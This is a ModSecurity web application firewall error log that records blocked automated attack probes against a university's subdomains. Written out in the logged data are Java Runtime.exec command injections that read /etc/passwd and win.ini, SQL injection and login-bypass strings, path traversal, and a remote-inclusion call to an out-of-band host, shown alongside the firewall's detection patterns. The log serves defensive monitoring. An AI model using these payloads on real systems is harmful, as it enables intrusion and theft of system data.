[Tue Aug 29 11:30:54.467406 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn2EAAAAP"]
[Tue Aug 29 11:30:54.488909 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOM4a0AAAAU"]
[Tue Aug 29 11:30:54.490637 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAO87@UAAAAF"]
[Tue Aug 29 11:30:54.508262 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPMmEgAAAAY"]
[Tue Aug 29 11:30:54.510290 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOM4a4AAAAU"]
[Tue Aug 29 11:30:54.510364 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAN@5A4AAAAO"]
[Tue Aug 29 11:30:55.304736 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAPMmEkAAAAY"]
[Tue Aug 29 11:30:55.306720 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAP05G8AAAAA"]
[Tue Aug 29 11:30:55.328197 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOM4a8AAAAU"]
[Tue Aug 29 11:30:55.371474 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10f8Co-f0AAAPMmEsAAAAY"]
[Tue Aug 29 11:30:55.376420 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPDn2QAAAAP"]
[Tue Aug 29 11:30:55.403734 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAO87@kAAAAF"]
[Tue Aug 29 11:30:55.405245 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOM4bEAAAAU"]
[Tue Aug 29 11:30:55.409157 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAOOubQAAAAW"]
[Tue Aug 29 11:30:55.423691 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPPSzYAAAAd"]
[Tue Aug 29 11:30:55.425257 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAO87@oAAAAF"]
[Tue Aug 29 11:30:55.427503 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAN@5BEAAAAO"]
[Tue Aug 29 11:30:56.315439 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPRNd4AAAAf"]
[Tue Aug 29 11:30:56.315686 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAP05HMAAAAA"]
[Tue Aug 29 11:30:56.324201 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAOM4bMAAAAU"]
[Tue Aug 29 11:30:56.334883 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAPOhccAAAAa"]
[Tue Aug 29 11:30:56.342045 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPLwBsAAAAX"]
[Tue Aug 29 11:30:56.351918 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAN@5BMAAAAO"]
[Tue Aug 29 11:30:56.364331 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAP05HUAAAAA"]
[Tue Aug 29 11:30:56.364628 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPLwBwAAAAX"]
[Tue Aug 29 11:30:56.381068 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPPSzkAAAAd"]
[Tue Aug 29 11:30:56.384052 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAOM4bUAAAAU"]
[Tue Aug 29 11:30:56.387136 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/account"] [unique_id "ZO10gMCo-f0AAAPLwB0AAAAX"]
[Tue Aug 29 11:30:56.387945 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAOKNs4AAAAK"]
